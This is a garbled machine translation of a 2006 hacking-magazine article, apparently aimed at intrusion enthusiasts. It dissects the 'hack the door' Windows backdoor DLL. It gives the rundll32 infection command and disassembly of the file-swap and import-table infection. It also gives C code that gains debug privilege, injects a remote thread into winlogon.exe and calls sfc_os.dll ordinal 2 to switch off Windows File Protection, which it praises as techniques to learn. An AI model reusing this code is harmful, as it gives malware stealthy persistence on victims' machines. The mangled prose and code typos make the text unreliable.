Hack the door to the charms: infection with the load-vulnerability warning-the black bar safety net

ID MYHACK58:62200613211
Type myhack58
Reporter 佚名
Modified 2006-12-10T00:00:00


Article source: wind blue Chi

For readers: the Black Controller lovers, intrusion enthusiasts, hobbyists

Pre-knowledge: hacking the door to the basic functions of the

Butterfly: learning hacking techniques is the key point lies in constantly learning advanced technology, continuously creating new things, so can the rapid development of network technology, the occupation of their own place. Recent attention to black weapons some what? Hack the door to the estimated that most people pay attention to the target, because it is too powerful, powerful to a It is not only a function of the strong Backdoor, while it also has a lot of ideas are relatively novel, it is worth everyone to learn. Just the author of this article through the write your own program and analysis hack the door code to get a very large increase, so to write this article. Holding the learning attitude from the technical angle analysis the hack program of preparation tips to share with you, 8 wrong 8 wrong!

Hack the door to the charms: infection with the load

Recently the back door produced a very strong interest in the Internet and you master the discussion, someone mentioned the“hack the door”is very powerful, but also be introduced to the more successful a back door, so the Internet to download a research study, by also learning wherein the method and skills. Dare not exclusive, share in this, and hope to master them advice.

“Hack the door”description

Hack the door using the current number of advanced Backdoor technology, it is only a Dll file, by infecting system files to start itself, the infected system the file size and date does not change; at the same time using a thread insert technology itself is not the process itself does not start in the mouth but to reuse the system processes the opening of any one port, as 8 0, the 1 3 5 and 1 3 and 9, 4 4 5, etc., so it's hidden very well, and penetrate the firewall is also very easy thing to do. This version of the file is not, only to provide some very useful commands. Not yet found how the tool can be found to the back door, like Fport, the Llister, the RKDetector and other search tools are ineffective. The program from the start

Since it is a backdoor, then they would have with the system startup and start, according to hack the door to the introduction, it is by infecting the system program file to implement the program since the start. Since it is a infected system file like a virus, then just look at the before infection and after infection of the system file the difference! In order to test the infection before and after difference, 我准备了一个专门用来被感染的文件TestLoad.exe it's nothing functional, just pop up a dialog box, so better to wait for the test, though small, perfectly formed, save drive system file. Then run the command:

C:>rundll32 hkdoordll, the DllRegisterServer TestLoad.exe 2 使 黑客 之 门 感染 TestLoad.exe infection after using the EXE file view tool eXescope to view the TestLoad. exe is infected before and after difference.

Infected before eXescpoe display the TestLoad. exe of the structure shown in Figure 1: ! Figure 1 After infection of the TestLoad. exe of the structure shown in Figure 2: ! Figure 2 As can be seen after infection of the TestLoad. exe the introduction of table a Hkdoordll. dll is introduced into the library. Careful observation after infection of the TestLoad. exe the introduction of the table for the address of the Import Table Address ITA has been changed, the original ITA is 0x000043FC, infection after 0x0000477E it. In order to further see the In addition to the infection before and after the file change, where the use of LordPE. exe compare infection before and after the TestLoad. exe the introduction of the table function, the result of the comparison shown in Figure 3: ! Figure 3 Tip: use LordPE. exe view exe files the introduction of the table function method: click on the PE Edito open the appropriate file, then click on the Directories, the pop-up dialog box after click on the Import Table to the right of the three points, so that you can view an executable file of the introduction table.

As can be seen, 只是在引入表链表中添加了一个相应的Hkdoordll.dll so when an infected program is run again, the 由 系统 的 程序 装载 器 搜索 Hkdoordll.dll and references to the infected program's address space, the backdoor is up and running. Hack the door of this sub-start way worth learning, comparative Dexterity.

Figure out the hack door of the start-up mode, we can manually clear it, here must not be Hkdoordll. dll deleted directly, this may directly cause the system to crash. Because the system in loading an infected program 假如 为 Services.exe)时 发现 没有 找到 Hkdoordll.dll Services. exe cannot be loaded, if infected is a system-critical process, then the system will not properly start. Clear when we can go to another machine on the same system with the patches 找 一 个 Services.exe will be infected with a program named Services2.exe will Services. exe copied to the System32 folder, restart PC, delete Hkdoordll. dll removal hack the door. Runtime infection

It says that the hack of the door since the start of the way, let's look at hack the door how is the infection running system files, which makes me dizzy very long, finally found is to use a very flexible tips. We know that on a Windows system, running the program file is generally not modified or deleted, it is because of this point, it appears a variety of programs running self-deleting, self-deletion is not our focus. However, careful users may have found that in Windows 2 0 0 0 or Windows XP system, we can of the running EXE file is renamed or moved. Then take just the TestLoad. exe to do the test, run:

C:>rundll32 hkdoordll, the DllRegisterServer TestLoad.exe 2 You can find the TestLoad. exe the folder within a file TestLoad. exe. bak, at first glance thought“hack the door”do good, automatically help you to backup system files, in fact this is the hack door of the Fox tail! Is it a last resort. 不要 关闭 TestLoad.exe and then try to delete the TestLoad. exe and TestLoad. exe. bak, was not found the miracle? Turned out the TestLoad. exe deleted, and TestLoad. exe. bak turned out to not get deleted, is not, and I just say contradiction? Non-too! Non-too! Just proves that just the words: hacking the door to put the TestLoad. exe renamed as a TestLoad. exe. bak, 然后生成一个被感染的TestLoad.exe so, the next time you run the TestLoad. exe is actually being replaced through the program, the original program is placed on the side. With the IDA Pro disassembly Hkdoordll. the dll can be found in the following function call:

File rename:

. data:1000C618 lea ecx, [esp+438h+FileName] . data:1000C61F lea edx [esp+438h+var_324] . data:1000C626 push ecx . data:1000C627 push edx . data:1000C628 call rename

Copy files:

. data:1000C66F lea edx [esp+440h+var_32C] . data:1000C676 push 0 ; bFailIfExists . data:1000C678 lea eax and, [esp+444h+var_228] . data:1000C67F push edx ; lpNewFileName . data:1000C680 push eax ; lpExistingFileName . data:1000C681 call CopyFileA

Move file:

. data:1000C795 mov eax, a [ebp+8] . data:1000C798 test eax, the eax . data:1000C79A jnz short loc_1000C7FE . data:1000C79C lea ecx, [esp+448h+var_334] . data:1000C7A3 push 5 ; dwFlags . data:1000C7A5 lea edx [esp+44Ch+var_230] . data:1000C7AC push ecx ; lpNewFileName . data:1000C7AD push edx ; lpExistingFileName . data:1000C7AE call MoveFileExA The above statement can actually be understood as: MoveFileEx(“TestLoad.exe””The TestLoad. exe. bak”, the MOVEFILE_DELAY_UNTIL_REBOOT| MOVEFILE_REPLACE_EXISTING);

Tip: MSDN in the MoveFileEx()function to explain as follows: BOOL MoveFileEx( LPCTSTR lpExistingFileName, the // pointer to the name of the existing file LPCTSTR lpNewFileName, the // pointer to the new name for the file DWORD dwFlags // flag that specifies how to move the file );

This process TestLoad. exe file image is actually TestLoad. exe. bak, 接着Hkdoordll.dll生成被感染的TestLoad.exe and save in the original file path.

Exterminate System File Protection

Once the system is started, Windows system will start loading the already infected system program, but due to the“hack the door”is by infecting the system program achieved since the launch of the, now encountered a different problem.

Everyone knowsIn Windows 2 0 0 0 and Windows XP system files protection function, once the protected system file is modified, it will pop-up need to insert the system installation CD disc in the dialog box. This leads to a problem TestLoad. exe is just an ordinary EXE file, and is not subject to System File Protection a system of protection of the system process, then why hack the door to modify the system process, theoperating systemfile file protection system will not remind? This, or using a disassembly hack the door to the method, observed it is how to turn off the system file protection feature.

Find the following code:

. data:1000BBB0 LoadSFCDLL proc near ; CODE XREF: sub_1000BC70+B7 . data:1000BBB0 push esi . data:1000BBB1 xor esi, esi . data:1000BBB3 call GetVersion ; Get current version number of Windows . data:1000BBB3 ; and information about the operating system platform . data:1000BBB9 cmp al, 5 . data:1000BBBB jnz short loc_1000BBDF . data:1000BBBD xor ecx, ecx ;in this case, Windows2000 system . data:1000BBBF mov cl, ah . data:1000BBC1 test cl, cl . data:1000BBC3 jnz short loc_1000BBD2 . data:1000BBC5 push offset aSfc_dll ; lpLibFileName . data:1000BBCA call LoadLibraryA ;this time for Windows XP system . data:1000BBD0 pop esi . data:1000BBD1 retn . data:1000BBD2 loc_1000BBD2: ; CODE XREF: LoadSFCDLL+1 3 j . data:1000BBD2 push offset aSfc_os_dll ; lpLibFileName . data:1000BBD7 call LoadLibraryA . data:1000BBDD pop esi . data:1000BBDE retn

The above code can be seen, Hkdoordll. dll according to theoperating system的 版本 调用 了 Sfc.dll 或者 Sfc_os.dll If is Windows 2 0 0 0 of Windows NT 5.0, 装载Sfc.dll; if it is Windows XP is Windows NT 5.1, 装载Sfc_os.dll the. Look at the following paragraph the disassembly code:

sub esp, 228h . data:1000BC76 lea eax and, [esp+228h+hObject] . data:1000BC7A push ebx . data:1000BC7B push esi . data:1000BC7C push edi . data:1000BC7D push offset aWinlogon_exe ; "winlogon.exe" . data:1000BC82 push 0 . data:1000BC84 push offset aDS ; "%d/%s" . data:1000BC89 push 1Fh . data:1000BC8B mov edi, ecx . data:1000BC8D push eax . data:1000BC8E call sub_10008C60 . data:1000BC93 add esp, 14h . data:1000BC96 lea ecx, [esp+234h+hObject] . data:1000BC9A push ecx ; lpMultiByteStr . data:1000BC9B call sub_100016CC //this sub-function is used to obtain the process ID . data:1000BCA0 cmp eax, the 0FFFFFFFDhSFC . data:1000BCA3 jb short loc_1000BCDB . data:1000BCA5 push offset aCanTGetWinlogo ; "Can't get the winlogon process id! rn"

The above function is used to get the Winlogon. exe process ID, so that following opening it injected into the code:

. data:1000BCDB push eax ; dwProcessId . data:1000BCDC push 0 ; bInheritHandle . data:1000BCDE push 1F0FFFh ; dwDesiredAccess . data:1000BCE3 call OpenProcess ;open the target process . data:1000BCE9 mov ebx, eax . data:1000BCEB test ebx, ebx . data:1000BCED jnz short loc_1000BD25

The above compiled the code snippet is to call the OpenProcess()function to open the Winlogon. exe process. Continue to observe the disassembly code and found the following paragraph:

. data:1000BD25 mov ecx, edi . data:1000BD27 call LoadSFCDLL . data:1000BD2C mov esi, eax . data:1000BD2E test esi, esi . data:1000BD30 jnz short loc_1000BD6F . data:1000BD6F push 2 ;function number is 2 . data:1000BD71 push esi ;SFC. the dll hModule . data:1000BD72 call GetProcAddress ;get SFC. dll ordinal number is 2 The address of the function . data:1000BD78 test eax, the eax . data:1000BD7A mov [edi+10h], and eax . data:1000BD7D jnz short loc_1000BDC3

可以 发现 上面 的 汇编 代码 用来 得到 以前 装载 的 Sfc.dll(或 Sfc_os.dll the ordinal number is 2 The function of the address. Then the program jump to the Loc_1000BDC3, continue to trace the disassembly code and found the following paragraph:

. data:1000BDC3 push eax ; just to give the SFC. the dll function address . data:1000BDC4 push ebx ; Winlogon. exe process handle to the . data:1000BDC5 mov ecx, edi . data:1000BDC7 call sub_1000BBF0note that here the calling function sub_1000BBF0 . data:1000BDCC push esi ; hLibModule . data:1000BDCD mov edi, eax . data:1000BDCF call FreeLibrary . data:1000BDD5 test edi, edi . data:1000BDD7 push ebx ; hObject Follow Sub_1000BBF0 function, Sub_1000BBF0 function: Entrance parameters: the process handle, the thread start address . data:1000BBF0 sub_1000BBF0 proc near ; CODE XREF: sub_1000BC70+1 5 7 p . data:1000BBF0 . data:1000BBF0 ThreadId = dword ptr -1 . data:1000BBF0 hProcess = dword ptr 7 . data:1000BBF0 lpStartAddress = dword ptr 0Bh . data:1000BBF0 . data:1000BBF0 push ecx . data:1000BBF1 mov ecx, [esp+1+lpStartAddress] . data:1000BBF5 mov edx [esp+1+hProcess] . data:1000BBF9 lea eax and, [esp+1+ThreadId] . data:1000BBFD push esi . data:1000BBFE push eax ; lpThreadId . data:1000BBFF push 0 ; dwCreationFlags . data:1000BC01 push 0 ; lpParameter . data:1000BC03 push ecx ; SFC. dll in the second function, the function address . data:1000BC04 push 0 ; dwStackSize . data:1000BC06 push 0 ; lpThreadAttributes . data:1000BC08 push edx ; previous open winlogon. exe process handle to the . data:1000BC09 mov [esp+21h+ThreadId], the 0 . data:1000BC11 call CreateRemoteThread ;create a far thread . data:1000BC17 mov esi, eax . data:1000BC19 test esi, esi ;ESI is saved just the newly created thread handle . data:1000BC1B jnz short loc_1000BC3F

. data:1000BC3F . data:1000BC3F loc_1000BC3F: ; CODE XREF: sub_1000BBF0+2B j . data:1000BC3F push 0FA0h ; dwMilliseconds . data:1000BC44 push esi ; the newly created thread handle . data:1000BC45 call WaitForSingleObject ;wait for the remote end of the thread . data:1000BC4B test eax, the eax . data:1000BC4D jz short loc_1000BC5D

. data:1000BC5D . data:1000BC5D loc_1000BC5D: ; CODE XREF: sub_1000BBF0+5D j . data:1000BC5D push esi ; hObject . data:1000BC5E call CloseHandle . data:1000BC64 mov eax and, [esp+5+ThreadId] . data:1000BC68 pop esi . data:1000BC69 pop ecx . data:1000BC6A retn 8 . data:1000BC6A sub_1000BBF0 endp

The above sub-function of the function is very simple, is to just open the Winlogon. exe process to create a new thread, the new thread calls the SFC. the dll number is 2 The output of the function, this will turn off the system file of self-protection.

In fact, according to the Bgate of the in Win 2 0 0 0/XP on a quiet alternative is to use the system file of this article to explain, in Windows 2 0 0 0(XP)system, 执行系统文件保护的代码在Sfc.dll(XP 在 Sfc_os.dll in this Dll from Winlogon. exe calls. Winlogon. exe main Call of the Sfc. dll in the two functions to achieve the System File Protection. Winlogon. exe Call of Sfc. dll of an output function at system startup time to create a series of events, Winlogon. exe the end of the call another function to close the above series of events, so that you close up the system protected files function. So we just need to Winlogon. exe in the injected code calls the“second”function, you can cancel the file protection function,“hacker door”also used just such a method.

Here need to pay attention to the process is injected into the Winlogon. exe, the need to enhance their own permissions to the Debug permissions.

HANDLE hToken; LUID DebugNameValue; TOKEN_PRIVILEGES Privileges; DWORD dwRet;

OpenProcessToken(GetCurrentProcess (), The TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, the hToken); LookupPrivilegeValue(NULL,"SeDebugPrivilege",&DebugNameValue); Privileges. PrivilegeCount=1; Privileges. Privileges[0]. Luid=DebugNameValue; Privileges. Privileges[0]. Attributes=SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, FALSE,&Privileges, sizeof(Privileges), the NULL,&dwRet); CloseHandle(hToken);

Above the whole turn off the system file protection function of the implemented in C language write to as follows:

/Get the process ID, The specific method can be used CreateToolHelpSnap32 (), the ProcessFirst32()and ProcessNext32 ()/ DWORD dwPid=GetProcessIdFromName(“Winlogon.exe”); HANDLE Process=OpenProcess (is, FALSE, dwPid); DWORD dwVersion; HMODULE hSfc; dwVersion = GetVersion(); //Determine theoperating systemof type if ((DWORD)(LOBYTE(LOWORD(dwVersion))) == 5) { // Windows 2 0 0 0/XP if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 0) //Windows 2 0 0 0 hSfc = LoadLibrary("sfc.dll"); else if((DWORD)(HIBYTE(LOWORD(dwVersion))) = 1) //Windows XP hSfc = LoadLibrary("sfc_os.dll"); } //Get the address of the function FARPROC dwAddress=GerProcAddress(hSfc, the MAKEINTRESOURCE(2)); DWORD dwThreadId; HANDLE hThread; //Create the Far thread hThread =CreateRemoteThread(hProcess, 0, and 0, and / (DWORD (__stdcall ) (void )) dwAddress, and 0, 0,&dwThreadId); WaitForSingleObject(hThread, the 0x0FA0);


Probably analysis done, just starting to get to hack the door when still think, in the end it is how the infection running System File? The original thought is to modify the process's handle to point to the process of the operation of the mask complete, for this reason I also read a lot of documentation. The results of the program disassembly of the study, and gradually found the hack door of the programming skills. Here also like to thank the“hacker door”, the author, did not give it to the packers, so we were fortunate enough to be able to see the excellent hack tool look now! Less than, welcome to advise, Mail to: fengcaho@163.com the. (Text involved in the program have been included into the magazine supporting the disc“magazine”column, according to the article The name of the lookup can be